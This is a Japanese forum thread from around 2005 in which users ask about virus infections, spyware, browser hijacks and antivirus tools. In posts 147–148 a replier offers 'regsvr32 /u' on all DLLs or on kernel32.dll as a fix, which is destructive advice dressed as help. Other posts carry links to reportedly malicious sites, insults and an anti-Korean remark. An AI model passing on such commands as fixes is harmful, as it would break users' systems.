シマンテックのセキュリティーチェックをしようとすると、
（IE6.0使用。ActiveX とスクリプト処理は有効）


「ウイルス検出」の実行ができません

「ウイルス検出」を実行するには、Microsoft Internet Exploer 5.0 以上を使用し、
ActiveX とスクリプト処理を有効に設定する必要があります


と出ます。なぜですか？

>>88
それは間違いなくスパイウェアだろ。

ウィルスに感染してファイルが書き替えられた場合、
そのファイルのタイムスタンプも変更されていますか？
もしくはタイムスタンプは変更せずに中身だけ書き替えるなんて芸当もできますか？

>>91
タイムスタンプは元々自由に書き換え可能な情報

すいません・・・　City of herosとか言うメッセージが出て
Ｃドライブが変なアイコンになってしまいました
どうすれば良いのでしょうか・・・　
教えて下さい　宜しく御願いします

>>93
マルチは氏ね

という事

スパイウェアはどうやって削除するんですか？

>>95
リカバリー

それ以外は方法ないんですか？

>>97
少しは自分で調べようともせんのか？

さっさとリカバリーしてしまえ

おまえら、ハッキリ言ってｷﾓｲ

でもちょっとだけ気持ち悪い

　　　　　　　　 　 ,:ﾞ::::::::::::::::::|　　　,.　-──- .ﾊ::::::: . ヽ
　　　　　　　　　/:::::::::::::|:::::::|,､イ´::::l::|::::::::::ヽ:ヽ::ヽ: . : . `,　　〉
　　　　　　　　 /::::::::::::::|:::::::|::::::|:::'!::::lﾊﾚ::::::､|::::|:::::|::::`,:::::|　 ｛
　　　　　　　　,!:::::::::::::::|: . ::ﾄ､:::lヽ;:ゝ|´ヽ::::::/|'ト|､:|::::|::l:::ﾘ　　;l
　　　　　　　　|:::::::::::::: |::::::::|ゝi,'､r:ﾃ､　　 ソ ｹﾏ;､:|::::|ﾉｿﾉ
　　　　　　 　 |::::::::::::::::|::::::::| ｲ:;;:::::''!　　　 　 {:;;'{ ｈ〔´
　　　　　　　 .|:::::::|::::::::|::::::::|　ヽ:-‐''　　　 　 ,　｀,,| ゝ}　　ヽ　　　
　　　　　　 　|::::::::|::::::::|::::::::| //〃 　 　 　 　 　 　}'　|　　｛　　　　ｱｱｧ ﾓｯﾄ…
　　　　　 　 .| :::::::|::::::::|:::::::::| 　　　　　　こ.ア 　,.ｲ　/　　　〉
　　　　　　　|:::::::::|::::::: |::::::::::|ヽ､　　　　　　　イ　　∧　　　ﾞ

>>53
こんな適当にレジストリいじって大丈夫だと思ってんのか？

age

hage

>>101
三日も経ってから言う程の事でも無いと思われ

>>52さんの教えてくれたとおりにＦＤＤ買ってきて、早速試したんですが、６枚目入れた後に
http://syobon.com/mini/src/mini9392.jpg
とブルースクリーンが出てその後どうにもできません。
いったいどうすればいいでしょうか？

>>105
Ｌａｖｉｅなら、起動時にＦ１０連打でリカバリメニュー選択画面になる？
なれば、リカバリ。
でも、ＨＤＤ壊れてたら、終わり。
ＨＤＤ買い換えて、ＮＥＣに電話して理科張りＣＤ買え。

先ほどネットをウロウロしていたら、突然PCの動きがおかしくなりました。
IEにAZZSERCHとかの複数のツールバーを勝手にインストールされ、
いろいろと書き換えられてしまったようです。

症状としては、再起動しても、起動して起動音が鳴った後に
壁紙のみが表示されて後は何も表示されません。
アイコンもツールバーもです。マウスクリックも効きません。
スタートメニューすら存在していないのです。

唯一、Ctrl+alt+delが機能したので、そこから「新しいタスク」
でspyBotを直接起動し、スパイウエアを駆除しましたが、
再起動後に壁紙しか表示されない状態が修正されません。
プロセスを見ると、スタートアップソフトなどはちゃんと起動しているみたいです。

どうもexplorer.exeが起動しないようです。新しいタスクから
explorerを指定しても起動しません。

あと、再起動後に壁紙が表示された後、一瞬だけDOSの画面が立ち上がり
すぐに消えます。

何かこの症状の改善策をご存じの方、または心当たりがある方、
ご指導よろしくお願いします。

OSはXP Proで、ウイルスソフトはノートンです。

追記ですが、セーフモードでも症状が同じで、
前回正常起動時に戻るも試しましたがダメでした・・・

ウィルス対策ソフトを常駐させていても定期的にスキャンする必要はあるのでしょうか？
ソフトは avast! のフリー版です。

ネットに接続していると
パソコンにエラーがあるので
http://www.regfix.com/
に接続するようにとのメッセージが出て
そこをＨＰで見てみると
http://www.registryupdate.com/
というサイトに行くんですが、

どうしたらよいでしょうか？

ノートンについて質問。インストールは無事に済みましたが
アクティブ化を要求されるので、サーバーに接続しようとしたが
無効なSKUとかメッセージが出てアクティブ化が失敗する。
電話でアクティブ化ってのも電話がつながらず。
HPに書いてあることはすべて試しました
SymKBFixってのもDLしてインストールしてみたしが結果は変わらず。
なにやら監査モードとやらになってるようなので、
HPに書いてある指示に従って対処してみたが、指定のファイルが
もともと存在してなかったので状況は変わらず。

シマンテックに質問したが、HPのリンク貼っただけのメールよこしただけで、
具体的な解決方法は書いてないというやる気の無さ。
（もう来年からノートンは使わん）

日にちも無いので、サーバーに接続する方法をお願いします。

ttp://hasikehasike.fc2web.com/index1.html
これ何かな？
教えて下さい

>>109
avastの常駐保護機能は悪魔でメモリ上のウィルスを探す機能、
ファイル側の検知は出来ないから、定期的にやるとよい。

頻繁にするのは逆にＨＤＤの寿命を縮めるかもしれん。

>>113
悪魔か。。。

>>113
ウィルスはメモリを通らずに進入することもあるということですか？
例えばどんな場合がありますかね？

>>115
例えば今お前のPCの前に座ってる奴とか

>>116
誰もいないよ。

WinXP用のアンチウイルスソフトを購入しようかと思っているのですが
デーモン等で常駐しないタイプで、マウスの右クリックから呼び出せるアンチウイルスソフトはありますか

URLだけでも教えてくださいまし、ちなみにノートンは買ったけど、うざい機能満載でイマイチでした
ネタじゃないので、マジレスお願いします！

>>118
ノートン買ったのなら要らない機能全部外して右クリックメニューからだけ
使うようにすれば良いじゃない。

>107
まだ生きてるか。
WindowsXPですよね。
セーフモードでも、前回正常起動時の構成でも起動できないんだよね。

じゃあ、セーフモードとコマンドプロンプトは試した？
試してなければ、セーフモードとコマンドプロンプトで起動してみて。
それで起動できたら、システムの復元。
セーフモードとコマンドプロンプトで起動すると、exolorer.exeの変わりに
cmd.exeが立ち上がり、以下の表示が出ると思う。
c:\>
この表示が出たら、%systemroot%\system32\restore\rstrui.exe
と入力してEnterを押す。
それと、
＞一瞬だけDOSの画面
どんなの？

パソコンのスピーカーからたまに「パシャ パシャ」という音がします。
一度なるとそれが定期的に繰り返され、しばらくすると消えます。
これってウイルスですか？

>>119
それが、最近の Norton は常駐しないと出来ないんですよ、更新も失敗するし・・・

>>121ウイルスチェックして何も出なけりゃ電波とか
携帯近くに置いてない？

>>121
IEのwebページ開く時の音な希ガス

>>124
ポップアップ広告ブロッカーを入れてるならそれが作動してる音か
スパイウェアが動いてるとかってことないすか？

>120
　ありがとうございます。
コマンドプロンプトから
システムの復元試しましたが、1日前までしか保存されておらず、
丁度日を又いでいたため、ダメでした・・・

で、ただ今復旧しました。
spybotの他にインストールしてあった
AD-awareをまたまたパス直接指定で起動して検索したら、
spybotでは検出できなかったヤツが引っかかり、
削除したら通常起動できました！！

セキュリティには気をつけてたはずなのに最近一番焦った出来事でした・・・

【使用OS】
XPSP1
【WindowsUpdateしてるか】
しています
【AntiVirusは何を使っているか】
ノートンアンチウイルス
【ちゃんとUpdateしてるか】
最新のにしています
【スキャンした結果（ウイルス名・発見場所）】
感染していませんと出る
【別のオンラインスキャンしたならその結果は】
感染１
WORM_AGOBOT.AWR
場所は
\c\windows\system32の　jswTss.exe
【症状を具体的に、分かる限りすべて書く】
昨日感染を発見してから、何回か勝手にシャットダウンの症状がでたり、
ブラウザのページが表示されなくなったりしています。
AGOBOTは色々対処法がでているのですが、拡張子が.AWRの亜種の駆除法が
ないので駆除できずにいます。
【何をしたらそんなことになったのか】
ファイルを送信するために一度FWを切って、数時間そのままでネットをしていたのが
原因じゃないかと思っています。mx,nyは使用していません。
【これまでにとった措置】
システム復元オフ、セーフモード状態で、レジストリからjswTss.exeを
削除しているのですが、再起動すると復活してしまいます。
AGOBOT駆除ツールを使っても.AWRという拡張子はサポートされていない
みたいで、駆除できませんでした。

どこか対策が出来るページを知っている方、または直し方がわかる方
いましたら、教えていただけないでしょうか。

88です。
110の方も全くそっくりな怪しいサイトに誘導されるようですね。
(危険なので、ココでは最初のhtは省略した方が良いと思います。)
名前もwinfixとregfix。似ている。同一犯かな？
私は馬鹿なので、素直にscanしそうになってしまいました。
アブナイ、アブナイ。
90の方によれば「スパイウェア」らしいとの事ですが、、、
さらに情報を望む！

>>127
>【使用OS】
>XPSP1
>【WindowsUpdateしてるか】
>しています
何か矛盾を感じないか？

>>127
おまえのようなのは何にでも感染していて結構
救いの手は差し伸べられませんよ

一つ言える事、既に何かに感染していて、ファイアーウォールを無効にした事により、
ネットワークワームに感染した
さっさとリカバリーしやがれ

開いただけでウイルスに感染するページ
http://pc8.2ch.net/test/read.cgi/sec/994847789/
から誘導されました・・よろしくお願いします。
OSはXP SP2、WinUpdateで最新状態でした。

↓危険です。以前、どっかのスレに貼られてた
p://www.xybererotica.com/

を間違えて踏んでしまい（Janeで閲覧中）、何かに感染しますた・・普段は
ﾀﾌﾞﾌﾞﾗｳｻﾞ使用でActive X、Java、JavaScriptなど全部切っているのですが、
標準のブラウザに設定していなかった為、踏んだらIEが起動して・・。
その時ｲﾝﾀｰﾈｯﾄｵﾌﾟｼｮﾝの設定はJava、JavaScriptがオンになっていたので
感染しました・・orz 確か開いた時にSun Javaが勝手に起動したような気がします。

AVGでスキャンして2、3個引っかかったので名前もろくに見ないで削除して
しまって現在に至るのですが、どういうウィルスに感染したのでしょうか・・
AVGで削除したので大丈夫なんでしょうか？心配です・・長文すみません。

>>131
それなら、Sun Javaの脆弱性を利用されたんだろうよ。
いつのバージョンのを使っているのやら？
今の所、最新にしてあればWindowsにプレビューだけで何かをインストールするようなサイトは発見していない。

>>130
／￣￣￣￣￣￣￣￣＼
| なわけねぇだろ！ |
＼＿＿＿＿　＿＿＿／
　　　　　∨
　／￣￣￣￣￣￣ミ
./　　 ,￣￣￣￣ミ
/　 ／　／　　＼ |
|　/　 ,(･)　(･) |
(6　　　　　つ　 |
.|　　　 ＿＿＿　|
.|　　　/＿＿_/ ／ 田中のＡＡ
/|　　　　　　／＼

>>131
悪いがそのトップページには何にも仕込まれていない。

>>131
>>134
レスありがとうございます。Sun Javaは最新では無かったようですorz
自分も今アクセスしてみたのですが・・ページが変わってしまっています！
踏んだ時はｴﾛｻｲﾄに飛ばされたのに・・

あと、ウィルス名をメモっておいたようです。すみません（´Д｀）
TROJAN_ANICMOO.A
JAVA/Bｙｔever.S /A
TROJAN dropper.small
JAVA/Bｙｔever.K .A-1

でした。AVGで削除できる種類のものですか？かなり凶悪なウィルスでしょうか？

外付けHDDとかにウイルスが観戦した場合はフォーマットすればいいんですか？
感染したウイルスはwin32/pariteです。

マイクロソフトのＨＰ
http://www.microsoft.com/japan/にアクセスできないんだけど、オレだけですか？
落ちてるって可能性はないよね？

>>137
いや、落ちてないよ。

ウィルスやワームに感染すると、マイクロソフトや主なアンチウィルスメーカーのサイトに
アクセスできなくなることあるけどな。
その場合、オンラインスキャンも利用できなくなる。

知人がny使用中にフリーズしたので強制終了したところ
電源を入れると電源が点く→消える→点く→消えるを延々繰り返すように
なったらしいのですがこれってウイルス？

>>139
知人じゃなくてオマエだろ？

いや知人だってば
知人と言うか兄だけど
パソコン立ち上がらなくなったらしいんで
私が書き込んでいるんです

ウイルスでしょうか？

>>141
>>1

>>139 F8を連打しつつ『起てー起つんだー』と叫びながら起動

141です、ごめんなさい


【使用OS】 winXP
【WindowsUpdateしてるか】 してない
【AntiVirusは何を使っているか】 ウイルスバスター2005
【ちゃんとUpdateしてるか】 してる
【スキャンした結果】
パソコンが起動しないのでスキャン出来ない

【別のオンラインスキャンしたならその結果は】 同上
【症状を具体的に、分かる限りすべて書く】 >>139
【何をしたらそんなことになったのか】 >>139

【これまでにとった措置】
故障と思いメーカーに問い合わせた所ウイルスではと返された

Download板に行けって意味だったんだが・・・

あ、ごめんなさい
そっちに行ってみます
すみませんでした

>>144
これ、マジ危険な状態
OSをセーフモードで起動（電源入れたらF8キー連打）
セーフモードで起動
スタートを開いてファイルを指名して実行
regsvr32 /u *.dll
OK押して再起動
これで治るぞ。

＞regsvr32 /u *.dll
こいつが駄目なら
regsvr32 /u kernel32.dll
PC初心者某スレのアドバイス

>>147-148
ありがとうございます
試してみます
板違いでしたのに本当に感謝してます
ありがとうございました

右下のタスクトレイに手紙二つ重ねた上に青の点が付いたようなアイコンが
出てるのですが、これはなんでしょうか？カーソルを当てると”221×248×90×8.ap221.ftth.ucom.ne.jp”とか
”YahooBB219055074076.bbtec.net”ってでるんですけど・・・
知ってる方居ましたら教えてください！

>>150
ウイルスや！
>>147か>>148

>>150
アンチウィルスソフトにavast使ってる？

>>152 アバスト使ってます！！何かあるのでしょうか？

>>153
アウトルックかなんかのメールソフトのメールをスキャンしてるんだろ。

ＯＳ：ＸＰ　ｓｐ２
ブラウザー：プニル
メールソフト：サンダーバード
>>154 一応メールをチェックしたのですが、そのようなメールアドレスからメール受信した
記録がなかったのですが・・
一応、オンラインウイルスチェックはしましたが、ウィルスは発見されませんでした。
でも、やはりウイルスでしょうか？

>>155
nyとかshare使ってない？

>>156 shareやってます！何か関係あるのでしょうか？

avastスレ行け。
ウィルスかどうか知りたければオンラインスキャンしろ

どう見ても精子です
本当にありがとうございました。

ポートが開いてるんだな。

>>160 ポートが開いてるから、どういうことなのでしょうか？
　　　　侵入されてるってことでしょうか？パソコンの中身を見られてるってことでしょうか？

自己解決しました。

すいません、もう他の板に逝ってきます！
では、レスしてくださった方ありがとうございました。

１６２さんへ　凸

【使用OS】
　xp　SP1
【WindowsUpdateしてるか】
　しています。
【AntiVirusは何を使っているか】
　バスター2006
【ちゃんとUpdateしてるか】
　しています。
【スキャンした結果（ウイルス名・発見場所）】
　発見されませんでした。
【別のオンラインスキャンしたならその結果は】
　していません。
【症状を具体的に、分かる限りすべて書く】
　症状は特に無いのですが、c:\windows\win.iniを開くと
　LoadDir=C:\Documents and Settings\ユーザー名\デスクトップ\
　という文字があります。これが気になっているんですが、
　なんなのかお教えいただけませんでしょうか？
【何をしたらそんなことになったのか】
　友人からゲーム（コピー）をもらってインストールしました。
【これまでにとった措置】
　バスター2006でウィルス検索をしました。
　結果は特に見つかりませんでした。

　よろしくお願いいたします。

【使用OS】
　xp　SP1
【WindowsUpdateしてるか】
　しています。
【AntiVirusは何を使っているか】
　バスター2006
【ちゃんとUpdateしてるか】
　しています。



？？？？？？？？？？？？？？

>>164

　 ∧＿∧
　（　´∀｀）　　／￣￣￣￣￣
　（　　　　）　＜　たぶん、古いゲームだから。
　｜ ｜ ｜　　＼＿＿＿＿＿
　（_＿）___）

LoadDir=・・・・・・は、まんま。「読め！！」

ttp://www.itmedia.co.jp/enterprise/articles/0511/02/news022.html
SONY BMGのコピー防止CDがrootkitを組み込む

このCDをWindowsマシンに挿入すると、ライセンス同意書が表示され、音楽プレーヤーが
インストールされると書かれているが、実はrootkitがインストールされることになる、
とF-Secureは指摘。直接このrootkitをアンインストールする方法はないとしている。
このシステムの実装では、ウイルスなどの悪質なソフトウェアがこのrootkitを
悪用して隠れることが可能だとF-Secureは述べている。
このため、最新のウイルス対抗ソフトを使っても探知できない可能性があるという。

>>166
レスありがとうございます。

＞LoadDir=・・・・・・は、まんま。「読め！！」
えっと、アドバイスいただいたのですが、よくわかりません。
気にしなくてもいいと思っても良いでしょうか？

好きにしろよもう

質問です。いきなり変なことになりました。誰か助けて下さい。初期化は絶対にやりません。
【使用OS】 XP
【WindowsUpdateしてるか】 感染したらどうすんの
【AntiVirusは何を使っているか】 Virus入れてどうすんの
【ちゃんとUpdateしてるか】 VirusのUpdateなんかやってどうすんの
【スキャンした結果（ウイルス名・発見場所）】 スキャンして起動しなくなったらどうすんの
【別のオンラインスキャンしたならその結果は】 オンラインスキャンなんかして、起動しなくなったらどうすんの
【症状を具体的に、分かる限りすべて書く】 わからん、いきなり変になった
【何をしたらそんなことになったのか】 いきなり変になった
【これまでにとった措置】 再起動
【その他の質問】 初期化は絶対にやりませんので、誰か治してください。

170です。
誰もレス無いね（藁
もしかして治せないの？
頭悪いんだね君たちって（藁
人の迷惑とか、攻撃の踏み台とかって、俺には関係無いし（藁
ずっとネットに繋いでいたって起動できているから（木亥火暴藁

>>170
>>171
随分頑張ったようだか何も面白くない。

とりあえず乙

>>170-171
俺マジで君が何いいたいのかわからんわ！
ごめんね！





マジ、氏ね！うざいから！

他の板から誘導されてこちらにきました。
先日、ノートンでトロイの木馬ウィルスを駆除した際、セーフモードにしてWindowsファイル（sysflg32．exe）に偽装したトロイウィルスを駆除しました。
しかしその後、Windowsを起動するたびに「そのファイルが存在しません」という警告が出るようになり、起動が非常に不安定になりました。
リカバリなしで元の状態に戻す術はありますか？
ソニーのバイオ、WindowsXPです。

>>174
バイオはパスも通ってないのかよ　ふ〜ん最低

>>174
ファイル名しか書かねえからよ　もう
システムファイルじゃねえな　それ
レジストリ内にそのファイルを起動する記述が残ってるからだろうが　もう　バカ

NOD32の体験版を入れていたのに、
Trojan-Dropper.Win32.Agent.jpというのに感染した。

あとで他の人にKaspersky、McAfee、Symantec、ClamAVが
とっくに対応済みだと指摘されて口惜しかったよ。('A`)
http://www.viruslist.com/en/viruses/encyclopedia?virusid=79420

質問です。教えてください。
頻繁に私のアドレスにウィルスを送ってくるメールアドレスが
あります。私のメールアドレスとよく似たアドレスで、
*****@****.○○○.ne.jpが私のメールアドレスだとしたら、相手は
*****@****.×××.or.jpという感じで、×××.or以外は同じです。
×××はプロバイダの名前なのですが、プロバイダに
苦情を言ったら、その私とよく似たアドレスを持っている人に
警告をしてくれるでしょうか。
それとも放っておいたほうがいいですか？

ウィルスは圧縮（zip）されていて、memoとかreportとかいうタイトルが
付いていることが多いです。今回来たのはInfo_prices.zipというものです。
どんなウィルスなのかは、すみませんよくわかりません。

>>178
メールアドレスは誰でもどんなメルアドにできる
例えばオレがあなたのメルアドをそのまま真似する事も可能
文句を言うならメールのソースを見てIPを調べてその
プロバに文句言って下さい

>>178
その手のメアド＝偽装と思って間違いないから警告しても無駄だよ

>>179
ありがとうございます。
私はてっきり、私と同じようなアドレスの方がウィルスに感染しているのに、
気が付いていないでいるのかと思っていました。違うのですね。
プロバイダの人に連絡してみます。

>>180
ありがとうございます。偽装だとプロバイダの人もわからないって
ことでしょうか。それじゃ、どうしょうもないかな。

ｘｐｓｐ２で、ノートン、Ａｄ−ａｗａｒｅです。
恥ずかしながらノートンは更新期限切れで１年ほどそのままです。
最近、Ａｄでスキャンすると頻繁に
「ｄｙｆｕｃａ」
が検出されます。
Ａｄで頻繁に駆除してますが、ノートン更新したがいいんですかね？
エロサイトはたまーに程度なので、なんで「ｄｙｆｕｃａ」が侵入してる
のかがよくわかりません。なんででしょう？

好きにしなさい

>>183
アンチウイルスは最新のものを使うのが肝心なので
フリーのAvast!を使うほうがいいとおもう
Ad-awareで復活するならPc-Cleanを試してみてくれ

>>185
Avast、Pc-Clean、いずれも調べてみましたが、よさげですね！
早速試してみます。
ありがとうございました。

PC-Cleanか・・・・

以前スパイウエアに感染してから、IEのホームページが必ず以下の
ページに設定されるようになってしまいました。
設定を変えても、PCを再起動すると必ずこのページがホームページ
に再設定されています。

↓アクセス注意。
ttp://www.findthewebsiteyouneed.com/

Ad-awareとSpybot、またノートンでは何も検出されません。
WinXpでIEは最新版です。
どなたか直し方をアドバイス下さい。

>>188
直せない人はリカバリー

そしてまた感染すると

ソニー、シマンテックと共謀しウィルス散布、F-Secure社員が感染し発覚
http://news19.2ch.net/test/read.cgi/news/1130905571/

>>188
Pc-Cleanをインストールして駆除できないか試したあと
「ブラウザ設定変更防止機能」を使ってブラウザのスタート
ページを固定してみてくれ

【使用OS】 2000pro sp4
【WindowsUpdateしてるか】yes
安置ウィルスソフトは入れてない、週二位でﾄﾚﾝﾄﾞﾏｲｸﾛのｵﾝﾗｲﾝｽｷｬﾝしている→昨夜問題なし
症状：
jpgのＵＲＬを踏んだ後強制再起動、再起動後はモニタが映らない
放置すると再起動を繰り返す、モニタは映らないままなので駆動音がするだけ
ｾｰﾌﾓｰﾄﾞにもならず、OS起動ディスク(FD)を入れると読んでくれるがモニタが(以下略
謎にごくたまに普通に起動することがあるが、暫く作業していると強制ｼｬｯﾄﾀﾞｳﾝ後一行目に戻る
原因：↓を踏んだ、場所は2ch
※注意　p//image.blog.livedoor.jp/uzu75/68f51aab.jpg
貼ってあったスレに危険を促す書き込みをしたが、問題ないとレス一件あり

モニタが映らないのでどうしたものやらです、サブからの書き込みです

>>188
何も問題なし

>>193
何も問題なし

違うんだ。
俺はモザイクをどうにかしようと…。
ただそれだけなんだ…。

　 ∧＿∧
　（　´∀｀）　　／￣￣￣￣￣
　（　　　　）　＜　MOZA
　｜ ｜ ｜　　＼＿＿＿＿＿
　（_＿）___）

Q.ウイルスバスターオンラインスキャンでは
　ウイルス無しと出るのですがMcAfeeフリースキャンでは
　C:\System Volume Information\...\A0000016.exe
　BackDoor-CUJ　←という名前のウイルスが見つかりました。
　ウイルスバスターってあんまりイケてないんですか？

>>198
大手三社なら
ノートン＞マカフィー>>バスターの剣出力だろ

バスター≧ノートン≧マカフィーだろｗ

>>198
System Volume Information でググれ。
初期設定では、このフォルダをチェック対象から外しているソフトもあるですよ。

Kasperskyが一番だろ。

ノートンが一番しょぼいと思うんだが。

最近Outlook Expressで、以前から登録していた禁止された送信者の一覧が消えてしまいました。
その後も再起動するたびに消えてしまいます。またメールの振り分け条件で送信者で削除条件を設定していた
ルールまで消えてしまいました。何かに感染しているのでしょうか？
XPsp2、ソースネクストウィルスセキュリティーが入っていてUPDATEはいつもしています。
よろしくお願いします。

>>204
HKEY_CURRENT_USER\Identities\{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}\Software\Microsoft\Outlook Express\5.0\Rules\Mail
削除してから再設定してみな
それでもダメなようならそのソフトを疑った方がいい

>>205
ありがとうございます、早速やってみます。

ソースネクスト製品はあまりいい話は聞かないな…

最近、｢ａ・ｂ・ｎ」を押すと、nbA}}}}} 、AAAAA、 }}}}}}}、 んbA｣｣｣｣｣などど、
訳のわからない文字が続いて出てきます。
シマンティツクとノートンでオンラインチェックをしても、ウィルスは検出されない
のですが、これは何なのでしょうか？
　

>>208

　 ∧＿∧
　（　´∀｀）　　／￣￣￣￣￣
　（　　　　）　＜　ソフトウエアセンシングだから、壊れちゃったんじゃないの？
　｜ ｜ ｜　　＼＿＿＿＿＿
　（_＿）___）

チェックはシマンティックとトレンドマイクロでした。
間違えてすみません。

>>209
えーっ！
本当に壊れているのでしょうか？
何でそうなったのだろう・・・。

寿命。

知らん間に勝手にＨＤの容量が減っていって今のところ５０ＭＢぐらい減ってしまいました
これはウイルスの影響の可能性は低いですか？

>>213
まず「システムの復元」でぐぐってみそ。

Virtual PC 2004 買いました
でもこれってXP はProfessionalじゃ無いと駄目なんですか？
Home Edition じゃ動かないんでしょうか？

悲しい

>>215
スレ違いはひとまず置くとして、買う前に動作要件ぐらい確認しろよ

確かに、
スレ違いな上にアホだった。
Yahoo!にでも出します。


実は解説書まで買ってしまった。
それを見てHome Edition 駄目って知った。

【使用OS】 WINDOWS2000
【WindowsUpdateしてるか】 多分してないです
【AntiVirusは何を使っているか】 ノートン2004
【ちゃんとUpdateしてるか】 してます
【スキャンした結果（ウイルス名・発見場所）】 ノートンでは発見されませんでした
【別のオンラインスキャンしたならその結果は】 Panda でスキャンしたら DiskInfo.A というハックツールが見つかりました。駆除できません。
【症状を具体的に、分かる限りすべて書く】 上のハックツールと一緒に Iroffer.AC というウイルスが発見されましたが、こちらは駆除できました。
また、そのウイルスのせいでCPUに負荷がかかっていたようです。DiskInfo.A については良く分かりません。
【何をしたらそんなことになったのか】 落としてきたフリーのゲームか外国サイトのプレイヤーを落とした時に感染したかと思います。
【これまでにとった措置】 DiskInfo.A でググりましたが日本語サイトは検索されず、英語サイトは翻訳をかけても分かりませんでした。
【その他の質問】 panda で Iroffer.AC が駆除できましたが、その前にトレンドマイクロでスキャンしたらBKDR_IROFFER.Uというウイルス名で発見されました。
Iroffer.ACと同じものでしょうか？

よろしくお願いします。

ちょっと前ならHome→Proのアップグレードパックで頑張るって手があったんだがな

本文のない、以下のようなヘッダのついたメールが届いたんですが・・・一体何なんでしょうか？
どなたか教えて下さい。お願いします。

※一部、○と●で伏字にしてあります。

>Return-Path: <zuj○[email protected]>
>Received: from 2○1.○1.○6.1○7 ([6○.1○5.○35.○6○])
> by b○○t.○○○○.○d.jp (8.12.10/8.12.10)
> with SMTP id jA47XbLT014705;
> Fri, ● Nov 2005 16:37:14 +0900 (JST)
>Date: Fri, ● Nov 2005 16:37:14 +0900 (JST)
>From: zuj○[email protected]
>Received: from 2○.1○4.1○3.○85
> by 6○.1○5.○35.○6○;
> Fri, 0● Nov 2005 01:30:18 -0600
>Message-ID: <Y[20
>X-UIDL: P%M!!~gK!!l71"!Ih$#!

お願いします。

【使用OS】 XP SP2
【WindowsUpdateしてるか】 YES
【AntiVirusは何を使っているか】 NOD32
【ちゃんとUpdateしてるか】 YES

「スタートアップ」に、いつの間にかインストールした覚えのない
「Security Update.exe」というのが入っていました。
プロパティ見ても不明、実行すると「ddd」と意味不明なメッセージが
出るだけで、見るからに怪しいのですが、NOD32ではウィルス検出は
されません。これってウィルスなんでしょうか？

こりゃー大変だ

>>221
必要なことが全く書かれてないなぁw

必要なこと

1)スタートアップへ登録されているショートカットの名前は何か？
「Security Update.exe」?
「Security」?

2)ショートカットのプロパティを見て、実際のexe名は何か？

3)そのexeの大きさは？

4)そのexeは何処に登録されているか？フルパス

NOD32が検知しなかったと騒ぐ前に、最低でもこれぐらいは書こうよ。
それとウィルスであると決まった訳でもない。

>>221
実行するなよｗｗｗ

検出力がＮＡＶに優るアンチウイルスソフトたのむ

225
マルチするな死ね

Nullporceに感染しちゃいました。デスクトップのアイコンが詰まってる
「遺失物保管庫セキュリティ強化型.zip」にパスがかかってるのですがどうしてもわかりません。
誰か教えてください（＞＜）

>>223
すみません。こんな感じです。

1) スタートアップに登録されているもの
2) 実際のexe名
All Userのスタートアップフォルダに「Security Setup.exe」という
名前の実行ファイルそれ自体がおいてあります。
ショ−トカットではないです。

3) exeのサイズ
1.70 MB (1,788,928 バイト) です。

4) フルパス
C:\Documents and Settings\All Users\スタート メニュー\プログラム\スタートアップ\Security Update.exe
です。

ウィルスと決めつけているわけではないのですが、
ググってもこのプロセスに関する情報が見あたらないので・・・。

>>224
正確には実行されてしまった、でした。

>>228
すみません、上の 1)、2) で肝心のプロセス名を間違えました。
4) に書いた方が正しく、「Security Update.exe」です。

【使用OS】win2000SP4
【WindowsUpdateしてるか】ここ一ヶ月ほどサボっていたような・・・
【AntiVirusは何を使っているか】バスター2004
【ちゃんとUpdateしてるか】そのつもりであります
【スキャンした結果（ウイルス名・発見場所）】検出されず
【別のオンラインスキャンしたならその結果は】ノートン　スパイボット共に無し
【症状を具体的に、分かる限りすべて書く】
OS起動中に画面いっぱいのニコチャンマークが出現→電源が落ちる
【何をしたらそんなことになったのか】
ネットを見ていて、どこぞのリンクをクリックした所、IEが固まる→再起動→現在
【これまでにとった措置】セーフモードでウィルス＆トロイ探し
　　　　　　　　　　　　セーフモードなら起動するのであります
この症例についてご存知の方
知恵を分けて下さいませ

>>230
マルチはスルーされる運命なのだよ

>>231
失礼しました
先に聞いたトピでは趣旨に反する質問だったと自分勝手に判断し
より適しているトピに投稿してみたのですが、確かにマナー違反でした
お気分を害してしまった事をお詫び致します

>>230
URLが分かれば、原因がわかる。
ぐぐったら緑色のニコマークが、云々って書いてあった。
何故いまだにバスター2004を使うのか…
アンチドートでスキャンしてみるとか。
OSの再インストールかな。

先ほど
ttp://acua.tv/fan/
をサイト巡り中に発見し、適当に画像をクリックしたらDOS窓のようなものが大量に出ました･･･
不安に思いDOS窓が4つほど出たところで強制終了をかけたのですが･･･
調べてもまったく判らないのでどなたか教えてもらえないでしょうか･･･
ウィルスとかだったりするんでしょうか･･･？

>>233
ありがとうございます
正直途方に暮れていたので助かります
URLなのですが、正直良く分からないのであります
適当にブログめぐりをしていたので、覚えていないのです
バスター2004については「バンドルされてたので何となく」であります

アンチドート　でありますか！
早速試してみます！

>>233
バスターのアップグレードもしたほうがいいんじゃない？
今年で2004はサポート切れるし。

235はバスターの製品アップデートが基本的に無料なのを知らない希ガス

>>234
telnet

>>238

調べてみたのですがIPが抜かれてしまったということでしょうか？

パソコン内の情報全て

　 /＼＿＿_／＼
／　／　　 　ヽ ::: ＼
|　（●）,　、（●）、　| 　　 ／￣￣￣￣￣￣￣
|　　,,ノ(、_, )ヽ、,, 　 | 　＜　>>240　ヴァカじゃん。
|　　　,;‐＝‐ヽ 　 .:::::| 　　 ＼＿＿＿＿＿＿＿
＼　　｀ニニ´　 .:::／
／｀ー‐--‐‐―´´＼

あげ

どういう時に、
ウィルスとかスパイウェアってはいってくるんですか？

>>243
心に隙間があるときです。

　 ∧＿∧
　（　´∀｀）　　／￣￣￣￣￣
　（　　　　）　＜　>>244　だね。
　｜ ｜ ｜　　＼＿＿＿＿＿
　（_＿）___）

http://www.itmedia.co.jp/enterprise/articles/0511/02/news015.html

うちの両親の使うウイルスバスター2004で「TSPY_LINEAGE.PJ」
というウイルス発見。と、同時にネットにも繋がらなくなった。
それでwinのsystem32に「hgdll.dll」というファイルが作成された
みたい・・・。
トレンドマイクロのDBにTSPY_LINEAGEの「.PJ」の情報はないん
だけど、googleで「hgdll.dll」を検索すると韓国でウイルス関係の
HP（文字が韓国語）が幾つもHit。多分このファイルの頭のHGっ
てハングルって意味？
多分、母親が最近韓国ドラマにはまって、よく関連HPを探してるみ
たいだからそれで感染したと思われ・・・。
両親、ネットサーフィン以外、まったくPCオンチの為、プロセスの
チェックとファイルの削除を電話による指示で試みたが、挫折・・・。
まぁー、（極端に）嫌韓の俺にとっては、内心「これで母親も目を覚
